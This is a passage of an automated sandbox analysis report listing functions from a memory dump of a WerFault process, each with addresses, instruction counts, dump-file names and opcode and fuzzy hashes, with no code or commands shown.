                                                • Opcode Fuzzy Hash: a466e744906314f643916410e0ab6c1460c824a29d2655d6ce65252c1f2f1af1
                                                • Instruction Fuzzy Hash: 2541BC31C4850E9BDB64EF08E8806FDB7B9FB5A390F00127AD01DE7281DB35AA85CB55
                                                Function 00007FF887B395C5 Relevance: .1, Instructions: 136COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0cf3bff4aae96dd0307a56af61d4da59970dcac53713a2a3da4e7e7c2b2e572
                                                • Instruction ID: 54b4edfa64cd6fede086700bb21b9571226d945b7a4b49bce98997f11370889b
                                                • Opcode Fuzzy Hash: a0cf3bff4aae96dd0307a56af61d4da59970dcac53713a2a3da4e7e7c2b2e572
                                                • Instruction Fuzzy Hash: 03410431E4E95A9FD7659B1CA8459BD7BF2FFA9394B0900B7E00EC3281DE18AC41C381
                                                Function 00007FF887B37B91 Relevance: .1, Instructions: 125COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 811308c0a72a8f76e0d9a76cb849d42381637500972ec779598514b2b5f006a1
                                                • Instruction ID: 45a8fda72f4c8fe92a0d152ea6bdc6cfadccfbeaf07b5dba0b8e3c9a553bbe83
                                                • Opcode Fuzzy Hash: 811308c0a72a8f76e0d9a76cb849d42381637500972ec779598514b2b5f006a1
                                                • Instruction Fuzzy Hash: 1F31A0318CE2C65FD35647206C226E93BB5BF03264F0A01E7E458CB492D92D6A9AC362
                                                Function 00007FF887B3159B Relevance: .1, Instructions: 116COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82f3f43ce528e926ad10ae4888d5fb22dbfa5b25b0dd551ab38bf53646829c88
                                                • Instruction ID: 5b1e1e86da075d964ac8d320ba236589c9eb71cdfdfbc36d92c369291ea98adc
                                                • Opcode Fuzzy Hash: 82f3f43ce528e926ad10ae4888d5fb22dbfa5b25b0dd551ab38bf53646829c88
                                                • Instruction Fuzzy Hash: 9F31AB35948A8E8FDB51EF98C8052EDBBF5FF59310F0401BAE808D7281DB38A954CB81
                                                Function 00007FF887B3CAD0 Relevance: .1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb4512f0c8b78c3f20000ca42361a4779d644b28801484261e97baad2bd7b7d2
                                                • Instruction ID: 11e150e128935cd58aba47201422c84af44f884157b5b83ea1ff8706e084966b
                                                • Opcode Fuzzy Hash: bb4512f0c8b78c3f20000ca42361a4779d644b28801484261e97baad2bd7b7d2
                                                • Instruction Fuzzy Hash: EC31B131D48A4E8FDB90EFA8D8495EE7BF5FF59350F010176E408D3291EA345981C791
                                                Function 00007FF887B30A62 Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33ce13d8901afa48ccfba2cc365b540bae33fea3edc5533f901509b5005d92db
                                                • Instruction ID: b40fad5aa14dda5704584850354fdca15cc3e8ac29212fef8e2be07feb73d7b6
                                                • Opcode Fuzzy Hash: 33ce13d8901afa48ccfba2cc365b540bae33fea3edc5533f901509b5005d92db
                                                • Instruction Fuzzy Hash: 323172B2E5490A9BEB88EB98E4656FDB7F2FF88B41B440035D01DD3697DE2828418B50
                                                Function 00007FF887B330C5 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ecc732f0007f330fd5eb97fee337905d9a666d17351465a69b93aed8ff5d10a
                                                • Instruction ID: 461f4f64f3e964ff448aad6598c67f40e03706daf52a1b8d72052e75fe6d8f87
                                                • Opcode Fuzzy Hash: 5ecc732f0007f330fd5eb97fee337905d9a666d17351465a69b93aed8ff5d10a
                                                • Instruction Fuzzy Hash: C831F23088D69D5FDB42DB649816AEE7FF0FF0A310F0501B7E448D7192CA2C9585C7A2
                                                Function 00007FF887B3D42D Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 65c1380afdeb5ae43c6e321d727795cc95775f6acce92e042adb396911e20964
                                                • Instruction ID: cd24ab4e8dc802296ac17efa7b4a2b6571d95ae4df148094748f8b1b611f88a1
                                                • Opcode Fuzzy Hash: 65c1380afdeb5ae43c6e321d727795cc95775f6acce92e042adb396911e20964
                                                • Instruction Fuzzy Hash: 9A21FF31E9C99A9FFB64A75868455FD77F2FF493A0B0400BAE00ED3181CE187840C392
                                                Function 00007FF887B410DB Relevance: .1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1386caf83b663839a76a02cab6279f6506a88081693bcae5b324a6160a7fc6e
                                                • Instruction ID: f51709c353eb85861665024858cd22379ce154d2ef4dd8846911a8ff8b0b8b15
                                                • Opcode Fuzzy Hash: f1386caf83b663839a76a02cab6279f6506a88081693bcae5b324a6160a7fc6e
                                                • Instruction Fuzzy Hash: 21312930D89A5D8FDF54EBA8C484AEC77B2FF59341B500939D00DE7292CB39A881CB40
                                                Function 00007FF887B39621 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7359c32864fbc81e8d3cf812787b46a5daf81a6ef8f71bd1659b62585d02847c
                                                • Instruction ID: 5f95f1092b8554e10247926457351e41897ef47c4acdc092a201d21c70fcdcfa
                                                • Opcode Fuzzy Hash: 7359c32864fbc81e8d3cf812787b46a5daf81a6ef8f71bd1659b62585d02847c
                                                • Instruction Fuzzy Hash: 40210231D8EA1B9FE7259B5868099BD7BF2FF69394F04007BE00ED3181DE186841C781
                                                Function 00007FF887B358AA Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba975e22425dd5650f524e52720d4694c2056f22f8403a5af04a8ac68f5fbf1c
                                                • Instruction ID: 5f3c3bf5e4ece006cb1bc55ae9ca8d9e9fef3c96d113d438cc19de92e82bd6fd
                                                • Opcode Fuzzy Hash: ba975e22425dd5650f524e52720d4694c2056f22f8403a5af04a8ac68f5fbf1c
                                                • Instruction Fuzzy Hash: 5521AD3094864E8FEB84EFA8D4546ED77B2FF99350F00047AE40AE7292DB385950CB81
                                                Function 00007FF887B31600 Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7beedfcfc5fd1ab72577d80c302e4a2c7423da021b66231d51afca368a79196c
                                                • Instruction ID: 33677eb543961909278b0efb04a9e471f3355f582c2bf1a3b0ab13f9e512ff0b
                                                • Opcode Fuzzy Hash: 7beedfcfc5fd1ab72577d80c302e4a2c7423da021b66231d51afca368a79196c
                                                • Instruction Fuzzy Hash: 73216A31958A4E8FDB55EFA8C8456EE7BF5FF59300F0401B6E809E3291DB38A954CB81
                                                Function 00007FF887B30598 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c3e2ebe80e9c374d19cd65d967bbc416cd4a94494180ce8268a98658466fb4e
                                                • Instruction ID: 0088c4d9398f1c4f04668932b455256636cde2424fb6ca3c1bdc08998050991a
                                                • Opcode Fuzzy Hash: 3c3e2ebe80e9c374d19cd65d967bbc416cd4a94494180ce8268a98658466fb4e
                                                • Instruction Fuzzy Hash: FD21B270D0861E8FDB58DFA8D8446EEB7F2FF48351F10057AE419E2291DB39A990CB90
                                                Function 00007FF887B3FBA6 Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02eee47cbd3cf8e3494fb5e24722281a56785d9fc19296375bc030aa15b5a12a
                                                • Instruction ID: d851bfe1cc886f7144df6a72529e76863bcad32aca3181f384185f294e54c508
                                                • Opcode Fuzzy Hash: 02eee47cbd3cf8e3494fb5e24722281a56785d9fc19296375bc030aa15b5a12a
                                                • Instruction Fuzzy Hash: E1212C30948A9D8FDB95EFA8C858BAC7BF2FF59301F0404AAD409E7255DB759881CB41
                                                Function 00007FF887B32F6A Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6ec4f843e7a6568539522b672a60eabd7ab9e49f500f508cac89074a62069e5
                                                • Instruction ID: cf44c87e9271303fe62efeedc147dc45d206e70f625f3b7bb12bb6ff133dc945
                                                • Opcode Fuzzy Hash: f6ec4f843e7a6568539522b672a60eabd7ab9e49f500f508cac89074a62069e5
                                                • Instruction Fuzzy Hash: 1421B634A4891D8FDF84EB98D495AEDBBF2FF59340F511169D00DEB252CA34A881CB40
                                                Function 00007FF887B3C658 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9926f5c443f5b9b126f35de00087391096f4ef52af95461597df5765fb553457
                                                • Instruction ID: 55da4e23f687e6368c7b67f8773dd8b9d701aebf92a9691ba1556dc30c472f6e
                                                • Opcode Fuzzy Hash: 9926f5c443f5b9b126f35de00087391096f4ef52af95461597df5765fb553457
                                                • Instruction Fuzzy Hash: 46114971D5850E8EEB94DFA898516EEBBF2FF48341B54443AD00ED32D6CE3829819751
                                                Function 00007FF887B33110 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b70332827c4b42890a8592d463c010797f2a38f8ecdcd5beab9492dd00a6fe17
                                                • Instruction ID: feb5d8a9a9eed7d83f6b2b05f0526b46f352bbc7642ff9dd8a431e4b0e9e084b
                                                • Opcode Fuzzy Hash: b70332827c4b42890a8592d463c010797f2a38f8ecdcd5beab9492dd00a6fe17
                                                • Instruction Fuzzy Hash: 5A110230A2891D9FDF80EB98D859BEEB7F1FB58311F00057AE409E3291DB34A850CB91
                                                Function 00007FF887B38F98 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57a8c4a8c030805c0b4f668d5c044de012241b32eabd3027d7c7917fd321e9f8
                                                • Instruction ID: 90b85693186d0d558e071f1eb59e44571248b0feaa56f0d738cfb58bdcca7963
                                                • Opcode Fuzzy Hash: 57a8c4a8c030805c0b4f668d5c044de012241b32eabd3027d7c7917fd321e9f8
                                                • Instruction Fuzzy Hash: E6112572D4894A8FEB85EAA89482AFC7BF2FF58340714057ED00EC3297DD3858C18781
                                                Function 00007FF887B31648 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 75d412aafae1dc40c9e514fa3efc25fed45c856c5d39002fe623db0605e8c512
                                                • Instruction ID: 7426004a454358672100e913764e8da44f9cf5b81ad080dc843e27de0df5acd0
                                                • Opcode Fuzzy Hash: 75d412aafae1dc40c9e514fa3efc25fed45c856c5d39002fe623db0605e8c512
                                                • Instruction Fuzzy Hash: 3B111235A58A5E8FDF94EF98C8456EE77F6FF58300F040176E909E3281DA78A950CB81
                                                Function 00007FF887B39345 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a012b66ddc4e467e85eee2c7884e478e59d5d50ac86e35035100d1a24d6d49cd
                                                • Instruction ID: 6e1bfef094179dd2ec8f0d8aa560554704a23cc5e8d63dbf1a245b1869a8c366
                                                • Opcode Fuzzy Hash: a012b66ddc4e467e85eee2c7884e478e59d5d50ac86e35035100d1a24d6d49cd
                                                • Instruction Fuzzy Hash: BE018871A5C9098FEB48EB68E8566ECB7F1FF5A324F00017AD00EC31C3DA255856C741
                                                Function 00007FF887B31650 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33bd0068108f305b81a401e42c52679442ad380e1a12b8c4d0679e1029fb48b6
                                                • Instruction ID: e6548a92d0c9ce4ee02e3f6eebbd92d99166c9d800574ea66e91488c08f4a20a
                                                • Opcode Fuzzy Hash: 33bd0068108f305b81a401e42c52679442ad380e1a12b8c4d0679e1029fb48b6
                                                • Instruction Fuzzy Hash: 02011334A18A1E8FCF50EF98C845AEE7BF5FF59300F000566E909E3250DB34A950CB91
                                                Function 00007FF887B39B1B Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0813890aa556226ec84fe0c0a3e47c32c4e50685e85c026203c2ac05ca726d8c
                                                • Instruction ID: 2a70e8015fc829f012a01875f5260d3337b7e190064dd0285186edafdf7c9ccc
                                                • Opcode Fuzzy Hash: 0813890aa556226ec84fe0c0a3e47c32c4e50685e85c026203c2ac05ca726d8c
                                                • Instruction Fuzzy Hash: 2C01F732E5C9875FE658AE6894452B9B7E1FF24784B4045B6D04EC7487EE28A849C341
                                                Function 00007FF887B308B1 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abe078782a40979f02210c8f37faf8d44b48d373a32f4105055071599d8ea811
                                                • Instruction ID: 5455f8483176def269dcdd0a9e3a6879abca73d57611f5bae3474a8ef9702630
                                                • Opcode Fuzzy Hash: abe078782a40979f02210c8f37faf8d44b48d373a32f4105055071599d8ea811
                                                • Instruction Fuzzy Hash: 63019E308486888FD745DF68D84C3AC3FA1FF99314F5445AAD408C72D2DB394498C742
                                                Function 00007FF887B3A088 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39897b33286641679da8fe291c8b5c533e35ccc474018e84a21ea71ccbc933ba
                                                • Instruction ID: 2a29d2d928271454d0d5fb1d5093f79d9065be4e0623614918102668b67453a3
                                                • Opcode Fuzzy Hash: 39897b33286641679da8fe291c8b5c533e35ccc474018e84a21ea71ccbc933ba
                                                • Instruction Fuzzy Hash: F701A731A58A468FD664EB38D0405A9B3F2FF59344B5049BDD04EC7596DE38F889C740
                                                Function 00007FF887B3F858 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e6bbbb821511d093432197523f0724074bc61dab6969a740953664cdf06f0c4
                                                • Instruction ID: bae5a5270fa10301cba3cc612f0574c2e26f97cff9f4165758a450b7ad5f6b5e
                                                • Opcode Fuzzy Hash: 1e6bbbb821511d093432197523f0724074bc61dab6969a740953664cdf06f0c4
                                                • Instruction Fuzzy Hash: D5016231A58A4A8FDAA4EB39D0445AA73F2FF54394B404ABDC04EC7596DE39F885C740
                                                Function 00007FF887B30955 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43d6aaddeb89e846f97585da6903b13bdbee751af44f9df376d5e1908d587318
                                                • Instruction ID: 29e65c9ada2adb0bd0c33bee21b97a1375383941716ab7fef7c3560c8c680f7b
                                                • Opcode Fuzzy Hash: 43d6aaddeb89e846f97585da6903b13bdbee751af44f9df376d5e1908d587318
                                                • Instruction Fuzzy Hash: B2F0C231C5854D9FE744EBA8C8452ADBBF2FF04300F4002B5D419C7192EE386994C741
                                                Function 00007FF887B3CB58 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a96b9a1807ddc865f0b72c4e78a99534d8463d7e5cb582ecd4bd0ca46e395e80
                                                • Instruction ID: 49db4022ce7af124a79b984efebab369b17ee933e6808ae948f5e032a5fdc2d7
                                                • Opcode Fuzzy Hash: a96b9a1807ddc865f0b72c4e78a99534d8463d7e5cb582ecd4bd0ca46e395e80
                                                • Instruction Fuzzy Hash: 2AF0E9B1C4894E6EF3A0A968980D57F6AF6FB89391B010277F40CC3190EE141C82C751
                                                Function 00007FF887B39F07 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2d7cf2d697dc77884c6a93860fdbaf12e868088c6b4a688a33719a64cef7a63
                                                • Instruction ID: c400dd6cb36b5718296911962f21aa5f7a60b5efc18b9fc4ca7d359800492253
                                                • Opcode Fuzzy Hash: a2d7cf2d697dc77884c6a93860fdbaf12e868088c6b4a688a33719a64cef7a63
                                                • Instruction Fuzzy Hash: 20F0AF32248A0B8BE325962CE8517D973E2EBC5360F65467AD449C7395DD3EE5C2C340
                                                Function 00007FF887B3F6D7 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a87b2da8a1335895c4643109daec343256f0f98190d8f31b8836a1b268995b8
                                                • Instruction ID: 011235c9477a1463ebd98fb147b7b3a8753d14c80f586458893f97ee1adf8778
                                                • Opcode Fuzzy Hash: 5a87b2da8a1335895c4643109daec343256f0f98190d8f31b8836a1b268995b8
                                                • Instruction Fuzzy Hash: 55F0AF32644A0B8BE7299A1CE4557D933E3EBC53A0F550A7AC819C7395DD3EE8C2C300
                                                Function 00007FF887B390A2 Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4980b3528ad17e3f8037ac2b4ef38a3230e4b80b732e5b377796478fd36c99ae
                                                • Instruction ID: 94956e8dd0086902bee09cf946fb546c9b6d475df73e737c5a64904d966000bf
                                                • Opcode Fuzzy Hash: 4980b3528ad17e3f8037ac2b4ef38a3230e4b80b732e5b377796478fd36c99ae
                                                • Instruction Fuzzy Hash: 78F0A931E1880E9FDF85EB98D459AEDB7F1FF58341B404165D41EE7292DE28A841CB50
                                                Function 00007FF887B3C5DD Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e18ba3c8755fb450a96292069b908d4a3914c9057cd39ece1d84af07e5d90332
                                                • Instruction ID: b3f369c2e6b6ca4a933c5cf5ae6dc481f3ed597386c1f2ddf826850408c2fe03
                                                • Opcode Fuzzy Hash: e18ba3c8755fb450a96292069b908d4a3914c9057cd39ece1d84af07e5d90332
                                                • Instruction Fuzzy Hash: 10F06D3184928A8FDB52DBA49C115AEBFB0BF49280B4405FAE419C7192CA381A54C751
                                                Function 00007FF887B31BE3 Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba41bc09fc2551e00e6bfdf961ff231ad3e8f6f713257567968f16bc40e09b1f
                                                • Instruction ID: f0dbdbf25fffa23ff008878286cc47f3966954854a44f610854ba3e725e453bf
                                                • Opcode Fuzzy Hash: ba41bc09fc2551e00e6bfdf961ff231ad3e8f6f713257567968f16bc40e09b1f
                                                • Instruction Fuzzy Hash: D8F01731E0891D8FEF94EB9C98856ECB7F6FB58341F50016AC40DE3242EE385891DB40
                                                Function 00007FF887B3B9CD Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6065ccd08c7418a69208a1c5074202534f9f6e7e785a7e38a9a230fa036e8997
                                                • Instruction ID: 6167a30add8608e84c7a9510e6a48ee39c4698950e4ae1bbf2def4abbf4c5d73
                                                • Opcode Fuzzy Hash: 6065ccd08c7418a69208a1c5074202534f9f6e7e785a7e38a9a230fa036e8997
                                                • Instruction Fuzzy Hash: 3DB00964CDD91791E82466A108962BE54E2BF493A8FA44AB2D40E4218EEC4E31D9E352

                                                Non-executed Functions

                                                Function 00007FF887B40F1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
